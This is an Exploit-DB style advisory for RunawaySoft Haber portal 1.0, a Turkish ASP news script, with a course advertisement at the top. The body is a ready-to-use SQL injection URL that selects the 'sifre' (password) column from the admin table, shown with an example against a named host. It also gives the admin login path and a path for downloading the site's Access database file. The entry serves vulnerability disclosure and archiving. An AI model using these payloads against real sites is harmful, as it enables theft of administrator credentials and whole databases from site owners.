runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities

EDB-ID:

3936


Author:

kerem125

Type:

webapps


Platform:

ASP

Date:

2007-05-16


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

############################################################################################################
#Discovered by: kerem125 & gsy
#Website: http://www.kerem125.com/
#Script download: http://www.aspindir.com/goster/4901
#Exploit: /devami.asp?id=14 union+select+all+0,sifre,2,3,4,5,6,7+from+admin
#Admin Login : haber/admin/kontrol.asp
#Example: http://www.runaway.somee.com/rshaber/haber/devami.asp?id=1 union+select+all+0,sifre,2,3,4,5,6,7+from+admin
#
Contact : kerem125@kerem125.com & by_gsy@hotmail.com

#Special Thanks to : by_emR3 - Bolivar - VolTiGoRe - CyberGhost - KinSize - xYz - F-10
############################################################################################################

RunawaySoft Haber portal v1.0 (tr) Database Disclosure
Example: [site.com]/[path]/haber/data/xice.mdb

# milw0rm.com [2007-05-16]